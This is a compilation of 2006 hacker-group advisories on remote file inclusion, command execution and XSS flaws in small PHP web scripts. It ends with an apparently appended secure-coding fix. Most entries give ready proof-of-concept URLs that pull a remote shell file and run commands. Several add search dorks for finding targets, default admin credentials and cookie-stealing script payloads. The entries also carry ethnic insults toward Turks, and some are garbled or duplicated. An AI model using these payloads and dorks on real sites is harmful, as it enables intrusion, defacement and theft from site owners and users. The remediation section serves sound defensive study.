[Kurdish Security # 27] Artmedic Links Script Remote File Include Vulnerability
* Kurdish Security Advisory *
Author : Botan
Script : Artmedic Links
Site : http://www.artmedic.de
Version : 5.0
Risk : High
Class : Remote
Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack
Nice crackerz sh00tz: milex, b3g0k, azad, fearless, darki, qawiste, RedSt0rm, zagros and other my friend
Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-27-artmedic-links.html

g00gle workz : artmedic links 5.0

index.php :

    <?PHP
    if(!isset($id)) [EMAIL PROTECTED]("index1.htm");}
    if($id=="search.php" or $id=="addlink.php") {include($id);}
    else [EMAIL PROTECTED]($id);}

http://www.site.com/[scriptpath]/index.php?id=y0urscripts.txt?cmd=id
[Kurdish Security # 25 ] GrapAgenda Remote Command Vulnerability
* Kurdish Security Advisory *
Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html
Script : GrapAgenda
Site : http://www.graphiks.net
Version : 0.1
Risk : High
Class : Remote
Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack
Nice crackerz sh00tz: milex, b3g0k, azad, fearless, darki, qawiste and team : ColdHackers, Patriotic Hackers, Kurdish Hackers Clan [back ? auyehuah maybe] other teamz

Google w0rkez :P : GrapAgenda

lol now code :]

    if($page!=""){
    include($page);
    }else{
    include("accueil.php");
    }
    ?>

huh :] nice code, PoC

http://www.site.com/[agendapath]/index.php?page=yourcode.txt?cmd=id
[Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability
* Kurdish Security Advisory *
Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html
Script : AnnonceV
Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
Version : 1.1
Risk : High
Class : Remote
Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack
Nice crackerz sh00tz: milex, b3g0k, azad, fearless, darki, qawiste and other my friends

Google w0rkez :P : AnnonceV1.1 : /admin/annonce.php : /annonce.php

lol now code :]

    $page=$_GET['page'];
    if(substr($page, -3) == 'txt') // for the news
    {
    include("newsdisplay.php");
    }
    else // for all other pages
    {
    include($page.".php");
    }
    ?>

http://www.site.com/annonce.php?page=yourcode.txt?cmd=id
http://www.site.com/admin/annonce.php?page=yourcode.txt?cmd=id
[Kurdish Security # 23] Spaw Editor Remote Include Vulnerability
* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack [EMAIL PROTECTED]
* Risk : High
* Class : Remote
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site : www.solmetra.com

    <?
    // include wysiwyg config
    include '../config/spaw_control.config.php';
    include $spaw_root.'class/lang.class.php';
    $theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme'];
    $theme_path = $spaw_dir.'lib/themes/'.$theme.'/';
    $l = new SPAW_Lang($HTTP_GET_VARS['lang']);
    $l->setBlock('colorpicker');
    ?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txtcmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?cmd=id

Special MSG! : The Turk state is the aggressor behavior Don't stay quiet. Hear the Kurdish people is scream be late.. Stop the Turkey Military!
[Kurdish Security # 16 ] newsReporter v1.0 Remote Command Execution
Kurdish Security
newsReporter v1.0 Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : newsReporter
Site : http://www.knusperleicht.at

Code :

    require ($news_include_path=.inc/config.inc.php);
    require ($news_include_path=.inc/engine.inc.php);

http://www.site.com/[scriptpath]/index.php?news_include_path=

Eof.
[Kurdish Security # 17 ] GuestBook 3.5 Remote Command Execution
Kurdish Security
Guestbook v3.5 Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : MoSpray
Site : http://www.knusperleicht.at

Code :

    define('FILE_POSTS',GB_PATH."db/posts.dat");
    define('FILE_SMILIE',GB_PATH."db/smilie.dat");
    $GB_INCLUDE[Img] = GB_PATH;
    $gb_failure = true;
    $gb_del = true;
    include(GB_PATH."admin/engine.inc.php");
    include(GB_PATH."db/settings.dat");

http://www.site.com/[scriptpath]/index.php?GB_PATH=evilcode.txt?cmd=id

Eof.
[Kurdish Security # 18 ] FAQ Script Remote Command Execution
Kurdish Security
FAQ Script v1.0 Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : FAQ Script
Site : http://www.knusperleicht.at

Code :

    //if the script is included you have to set this path else the path must be $faq_path = "";
    $faq_path = "";

http://www.site.com/[path]/index.php?faq_path=evilcode.txt?cmd=id
[Kurdish Security # 19 ] FileManager Remote Command Execution
Kurdish Security
FileManager Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : FileManager
Site : http://www.knusperleicht.at

Code :

    $dwl_download_path = "downloads";
    $dwl_include_path = "dwl/";
    include($dwl_include_path."index.php");
    ?>

http://site.com/[path]/dwl_download_path=evilcode.txt?cmd=id
http://site.com/[path]/dwl_include_path=evilcode.txt?cmd=id
[Kurdish Security # 20 ] Quickie Remote Command Execution
Kurdish Security
Quickie Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : Quickie
Site : http://www.knusperleicht.at

Code :

    #-- INCLUDE PATH --
    # Example:
    # Path of the main page in which we want to include the quickie:
    # http://www.url.at/index.php , this code is added to index.php: include("quickie/quickie.php");
    # Quickie is located in the folder: http://www.url.at/quickie/quickie.php
    # So the path is :: define('SB_PATH',"quickie/");
    define('QUICK_PATH',""); # path of the quickie
    #-- INCLUDE PATH --

http://site.com/[path]/quickie.php?QUICK_PATH=evilcode.txt?cmd=id
[Kurdish Security # 21] ShoutBox v4.4 Remote Command Execution
Kurdish Security
ShoutBox Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : ShoutBox
Site : http://www.knusperleicht.at

Code :

    //**
    // INCLUDE PATH
    define('SB_INCLUDE_PATH', $sb_include_path);
    // INCLUDE PATH
    //**
    include SB_INCLUDE_PATH.'inc/config.inc.php';
    require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php';
    require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
    require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
    require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
    require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
    if(SB_INCLUDE_PATH == "") {

http://www.site.com/[path]/index.php?SB_INCLUDE_PATH=evilcode.txt?cmd=id
[Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo Joomla]
Kurdish Security
MoSpray Remote File Include Vulnerability
Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Risk : High
Class : Remote
Script : MoSpray
Site : http://www.caneblu.com
Thanx : kurdishsniper, netqurd, flot, azad, darki, B3g0k, jubni, milex, fearless, kha, kca and other my friends

codes

    require("$basedir/components/com_mospray/lang/$lang/admin.php");

d0rkiz : allinurl:com_mospray

http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?cmd=id

Used link :]
admin.php
details.php
modify.php
newgroup.php
newtask.php
rss.php

e0f
[Kurdish Security # 11] SiteBar Cross-Site Scripting
Kurdish Security Advisory irc.gigachat.net #kurdhack Viva Kurdistan! SiteBar Script Cross-Site Scripting Attack Site : http://brablc.com/ Version : All Version Proof of Concept : http://www.site.com/sitebar/command.php?command=[CODES] Original Advisory : http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-11-sitebar-cross-site.html
[Kurdish Security # 10 ] MF Piadas 1.0 Remote File Include Vulnerability
# # Kurdish Security Advisory # MF Piadas 1.0 Remote File Include Vulnerability # Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz . Abdullah Ocalan # STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN ! # Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED] # Risk : High # Class : Remote # Script : MF Piadas # Script Website :http://www.mastersfusion.com.br # Version : 1.0 # Thanx : Netqurd,Milex,Flot,Azad,Darki,Jubni,PH,KHA,KCA and other my friends #Original Advisory : http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-10-mf-piadas-10.html # This is script to be found remote file execution bug. At first this is script is necessary to become competent. Hacker the passing can do scripts. For this reason this scripts is by published did same the passwords. Passwords in generally ; username : admin password : admin if you enter in a shape successfull the system. You can make run code of far away. Proof Of Concept : http://www.site.com/[scriptpath]/admin/admin.php?page=yourcode.txt?cmd=id And Cross-Site Scripting Attack http://www.site.com/[scriptpath]/admin/admin.php?page=[code] EoF #
[Kurdish Security # 9] MyMail Directory Traversal And XSS Attacking Vulnerability
# Kurdish Security Advisory # irc.gigachat.net #kurdhack # Discovered by Botan # http://scripts.codingclick.com/MyMail/ http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-9-mymail-directory.html CodingClick.com MyMail Script is useing for scripts.The passing can do between directory. Examine.. Now only first Directory Traversal vuln Vulnerable Version = 0.x http://www.site.com/[MyMail_path]/admin/ http://www.site.com/[MyMail_path]/admin/list.php?action=add http://www.site.com/[MyMail_path]/admin/email.php?action=add or /delete http://www.site.com/[MyMail_path]/admin/export.php http://www.site.com/[MyMail_path]/admin/archive.php?Action=add or /delete Now XSS attacking looking Vulnerable Version = 1.0 Beta http://www.site.com/[MyMail_path]/admin/login.php=error=[XSS]
[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz

    $url_path_editor = "$root_url/library/editor/";
    $abs_path_editor = "$root/library/editor/";
    ?>

Proof Of Concept

http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id
Re: OaBoard 1.0 Remote File inclusion
http://evuln.com/vulns/3/exploit.html look :]
[Kurdish Security # 7] Foing Remote File Include Vulnerability [PHPBB]
# Kurdish Security Advisory
# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
# Foing Remote File Include Vulnerability [PHPBB] :}
# "O History, either we will attribute successes to you or we will count you as never lived." Abdullah Ocalan
# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED]
# Risk : High
# Class : Remote
# Script : Foing
# Script Website : http://foing.sourceforge.net/
# Version : Foing 0.7.0 0.6.0 0.5.0 0.4.0 0.3.0 0.2.0
# w0rkz : Powered by foing 0.7.0 © 2003, 2004 Foing Group Powered by foing 0.6.0 © 2003, 2004 Foing Group etc..
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc..
# Special Bitch : Turkish LameRz :]
# cmd shell example:
# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

Get along at directory config.php did you meet of ..

    <?php
    define('FOING_INSTALLED', true);
    $phpbb_root_path = '../';
    $foing_prefix = $table_prefix;
    ?>

Proof Of Concept :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
[Kurdish Security # 4] phpRaid Remote File Include Vulnerability (PHPBB)
# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB] :}
# "To insist on socialism is to insist on being human." Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED]
# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Version : phpRaid v2.9.5 v3.0.b1 v3.0.b2 v3.0.b3
# Risk : High
# Class : Remote
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D
# Special Bastard : Turkish Lame
# w0rkz : phpRaid inurl:phpRaid etc. :)
# cmd shell example:
# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

At first for phpbb portal :) }

    <?
    // define our auth type
    define("AUTH","phpbb");
    // database connection
    global $user_group_table;
    $user_group_table = $phpbb_prefix . "user_group";
    // setup phpBB user integration
    define('IN_PHPBB', true);
    // set this as the path to your phpBB installation
    include($phpbb_root_path . 'extension.inc');
    include($phpbb_root_path . 'common.'.$phpEx);

http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?cmd=id
http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?cmd=uname -a
[Kurdish Security # 5] phpRaid Remote File Include [SMF]
# Kurdish Security Advisory
# phpRaid Remote File Include [SMF] :}
# "To insist on socialism is to insist on being human." Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED]
# Risk : High
# Class : Remote
# Script : phpRaid
# Script Website : http://www.spiffyjr.com
# Version : phpRaid v2.9.5 v3.0.b1 v3.0.b2 v3.0.b3
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D
# Special Bastard : Turkish Lame
# w0rkz : phpRaid inurl:phpRaid etc. :)
# cmd shell example:
# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

Now SMF portal code :)

    // includes
    include($smf_root_path= . 'SSI.php');

http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?cmd=id
http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?cmd=uname -a
[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP)
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html

#ColMenus Event Remote File Include Vulnerability#
#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]
#Script : CoolMenus v4.0 Event Script
#Risk : High
#Class : Remote
#Greetz : B3g0k, Nistiman, Flot, Netqurd etc..
#d0rk : /event/index.php?page=

I.

    require(event_inc.php);
    echo Events;
    $start = filectime($news);
    $jetzt = time();
    $update = $start+$timespan;
    if($jetzt = $update) {include(event_html.php);}

II. Proof of Concept:

http://www.site.com/[path]/event/index.php?page=evilcode.txt?cmd=uname -a
[Kurdish Security #2] Artmedic Event Remote File Include Vulnerability
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html

#Artmedic Event Remote File Include Vulnerability
#Website : http://www.artmedic.de/
#Script : Artmedic Event Script
#Risk : High
#Class : Remote
#Greetz : B3g0k, Nistiman, Flot, Netqurd etc..
#d0rk : /event/index.php?page=

Artmedic Web Desing Description [German, translated]

artmedic event, author Ellen Baitinger, artmedic webdesign, http://www.artmedic.de
This program is freeware and may be used free of charge as long as the link to artmedic webdesign and the authorship notices remain untouched.

I.

    if(!file_exists("artmedic_event_inc.php")) {include("setup.php"); exit; }
    require("artmedic_event_inc.php");
    echo $eventtitle;
    $start = filectime($news);
    $jetzt = time();
    $update = $start+$timespan;
    if($jetzt = $update) {include("artmedic_event_html.php");}

II.

    if(!$id and !$page) [EMAIL PROTECTED]("artmedic_event1.htm");}
    if(!$id and $page) [EMAIL PROTECTED]($page);}
    if($id==1) {include("artmedic_event_inputform.htm");}
    if($id==2) {include("artmedic_event_add.php");}
    ?>

III. Proof of Concept:

http://www.site.com/[path]/event/index.php?page=evilcode.txt?cmd=uname -a
EasyGallery Cross-Site Scripting
Website : www.wingnut.net.ms Author : Botan Credits : B3g0k,Nistiman,flot,Netqurd Original Advisory : http://advisory.patriotichackers.com/index.php?itemid=5 Description : EasyGallery is a simple web-photogallery with a maximum of user-friendlyness. All you have to do is to upload your photos and the EasyGallery files onto your webspace XSS code : http://www.site.com/[path]/EasyGallery.php?ordner=XSS
phpLister v. 0.4.1 XSS Attacking
Website : www.phplister.org Version : 0.4.1 Credits : B3g0k,Nistiman,Flot,Netqurd and other my friends Original Advisory : http://advisory.patriotichackers.com/index.php?itemid=3 XSS : http://www.site.com/[path]/index.php?page=XSS
Calendarix yearcal.php XSS Attacking
Website : http://www.calendarix.com

Vulnerable :

    if (!isset($_GET['ycyear']))
    $ycyear = $y ;
    else
    $ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>
MyEvent Remote File Execution And XSS Attacking
Website : http://mywebland.com/
Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k, Nistiman, flot, Netqurd etc.. my forget other friends

Google look for :) = MyEvent 1.2 or /calendar/myevent.php

I. Remote Code Execution

This is script to very big high it bug being found.

Event.php remote code execution :

    global $myevent_path;
    include_once $myevent_path."includes/template.php";
    $template = new Template($myevent_path."templates/") ;
    $template->set_filenames(array(
    'event' => 'event.tpl',
    ?>

Did you see the myevent_path :)

http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?cmd=uname -a

İnitialize.php Remote Code :

    include $myevent_path."config.php";
    include $myevent_path.$language;
    include_once $myevent_path."includes/template.php" ;
    $db = mysql_connect($host,$login,$password);
    mysql_select_db($base,$db);

Yep now code

http://www.site.com/[path]/initialize.php?myevent_path=http://www.site.com/x.txt?cmd=uname -a
phpFaber TopSites Script Cross-Site Scripting
Description : phpFaber TopSites is a feature-packed, reliable and secure Top List coded in PHP and mySQL. phpFaber TopSites has proven its reliability time and time again under the most active server environments. Our feature list is large, including all elements you need to easily maintain your list, and even make money of it. phpFaber TopSites can be integrated with all your favourite applications to save you the hassle of running two separate user systems. phpFaber TopSites includes what you expect from a Top List and much much more. It is fully customizable and doesn't require any programming skills! You can create your topsite just in 3 clicks!

Vulnerable :

http://www.example.com/index.php?page=<script>alert(document.cookie)</script>
FleXiBle Development Script Remote Command Execution And XSS Attacking
Description :

    /*
    File created by Andries Bruinsma
    (c) FleXiBle Development (FXB)
    Web: http://www.ahbruinsma.nl
    Email: [EMAIL PROTECTED]
    File: main.php
    Version: 3.0
    Date started: 10th May, 2004
    Last modified : 24th January, 2006
    Last Update: New layout

Vulnerable

    ob_start("ob_gzhandler");
    //Defining some functions and including them
    require('php/messages.php');
    //require base-file
    //require_once('php/base.php');
    include_once "baseconfig.inc.php";

http://www.site.com/[path]/evilcode.txt?cmd=uname -a
Warcraft III Replay Parser Script Remote Command Execution Vulnerability And Cross-Site Scripting Attacking
Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c

Description : Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work.

I. Remote Command Execution .. Our path is the path of the Agits.!

http://www.site.com/[path]/index.php?page=evilcode.txt?cmd=uname -a

2. XSS Attacking

http://www.site.com/[path]/index.php?page=evilcode.txt?cmd=uname -a

Solution : up version :)

Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com

The 14 are immortal.
CanfTool v1.1 Cross Site Scripting Attack
Cross Site Scripting Attack CanfTool v1.1

Description : Conftool is a Web-based online system that was developed to supports many administrative tasks of conferences, workshops and seminars. It can help to make the management of events easier and much more efficient. ConfTool does not only support the submission/review-process, but also the registration of participants and many other tasks. Conftool is an open/shared-source system, technically mature and available under different licenses. We offer a free license of the standard version VSIS ConfTool for non-commercial conferences and events (i.e. only voluntary staff, less than 200 participants, student discounts). Please consider our license terms for non-commercial events. In addition to this, following products and services can be purchased: Per-conference and per-site licenses of VSIS ConfTool for organizers of small to medium size events. ConfTool Pro, an extensively enhanced version of ConfTool suitable for organization of larger events and offering much more features. Professional support for ConfTool and ConfTool Pro. Modifications of the software to the specific needs of your event. Hosting of ConfTool and ConfTool Pro. If you are interested in any of the above, please send a mail to [EMAIL PROTECTED] with some information about your event.

WebSite : http://www.conftool.net

Vulnerable : http://www.example.com/[path]/index.php?page=<script>alert(document.cookie)</script>

Solution : No patch available, please use another version

Thanks : Patriotic Hackers members
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
HeffnerCMS Remote Command Execution And Cross Scripting Attack
Website : http://www.christian-heffner.de
Version : 1.07

I.

    <?php
    $filename="index.php";
    require_once 'vlib/vlibTemplate.php';
    $tmpl = new vlibTemplate('tmpl/std/index.tpl');
    require_once 'config/db_config.php';
    require_once 'config/pcfunctions.php';

It's flying :) lol

II. Vulnerable code ;

http://www.site.com/index.php?page=evilcode.txt?cmd=uname -a

III. Cross Scripting Attack

http://www.site.com/index.php?page=<script>alert(document.cookie)</script>
http://www.site.com/index.php?page=<script>alert("Patriotic Hackers")</script>
Etc..

IV. Solution

No

Greetz ; B3g0k, Azad, Nistiman, Hawar, Seyh and other our friends..
irc.gigachat.net #kurdhack www.PatrioticHackers
CoreNews 2.0.1 Remote Command Execution
Webpage : www.coreslawn.de Risk : high Code : http://www.example.com/index.php?page=evilcode?cmd=id For Patriotic Hackers Freedom For Ocalan irc.gigachat.net #kurdhack
SMBlog Remote Command Execution
Offical webpage : http://superbounou.phpnet.org/smartblog/ Version : v1.2 http://www.site.com/[path]/index.php?evilcode?cmd=id http://www.site.com/?pg=evilcode?cmd=id Patriotic Hackers irc.gigachat.net #kurdhack Botan,B3g0k,Seyh,Nistiman
Knowledgebases Remote Command Execution
Web Site http://www.activecampaign.com/support/ Version : 1-2-All KB * KnowledgeBuilder KB * iSalient KB * SupportTrio KB * visualEdit KB * General KB This is a support-faq script. The questions is asked. But this a script high the risk at bug. Malicios person to reach far away. Vulnerable : http://www.site.com/[path]/index.php?page=http://evilcode?cmd= Patriotic Hackers http://www.patriotichack.org We Are Politic Kurdish Defacers! Botan,b3g0k,Azad,Nistiman,Seyh Special Thanks : All Kurdish Defacers
Tasarim Rehberi Index.PHP Remote Command Execution
Web Site : http://www.tasarimrehberi.com [Turkish Desing] Description : index.php remote attack Vulnerable ; http://www.site.com/index.php?sayfaadi=; and index.php?sayfa= Patriotic Hackers! Botan,B3g0k,Azad,Nistiman,Fesih :} Freedom For Ocalan
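
Most of the file-include advisories listed above quote the same pattern: a request-controlled value (`$page`, `$id`, `$phpbb_root_path`, `$spaw_dir`, `GB_PATH` and so on) is concatenated into `include`/`require`. The following PHP is an added example of the corrected form, not code from any of the listed scripts or their authors; `APP_ROOT`, `PAGES`, `resolve_page()` and the `pages/` layout are hypothetical names chosen for illustration.

```php
<?php
declare(strict_types=1);

// Added example; APP_ROOT, PAGES and resolve_page() are hypothetical names.

// The application root is derived from the script's own location. It is never
// read from the request, unlike $phpbb_root_path, $spaw_dir or GB_PATH in the
// snippets above, which a caller could set when register_globals was enabled.
define('APP_ROOT', __DIR__);

// Allowlist: the only values ?page= may take, each mapped to a shipped file.
const PAGES = [
    'home'    => 'pages/home.php',
    'search'  => 'pages/search.php',
    'addlink' => 'pages/addlink.php',
];

/**
 * Resolve an untrusted page token to an absolute path under APP_ROOT.
 * Returns null for anything that is not an exact allowlist key, so a value
 * such as "yourcode.txt?cmd=id" or a remote URL never reaches include.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and unknown tokens are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    // Defence in depth: canonicalise and confirm the file is inside APP_ROOT
    // (catches a symlinked or mistyped allowlist entry).
    $root = realpath(APP_ROOT);
    $path = realpath(APP_ROOT . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($root === false || $path === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET; do not rely on a global $page.
$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
require $target;
```

On the server side, `allow_url_include` (Off by default since PHP 5.2) blocks the remote-URL variants, and `register_globals` was removed in PHP 5.4; the allowlist is still needed because neither setting stops inclusion of a local file chosen by the request.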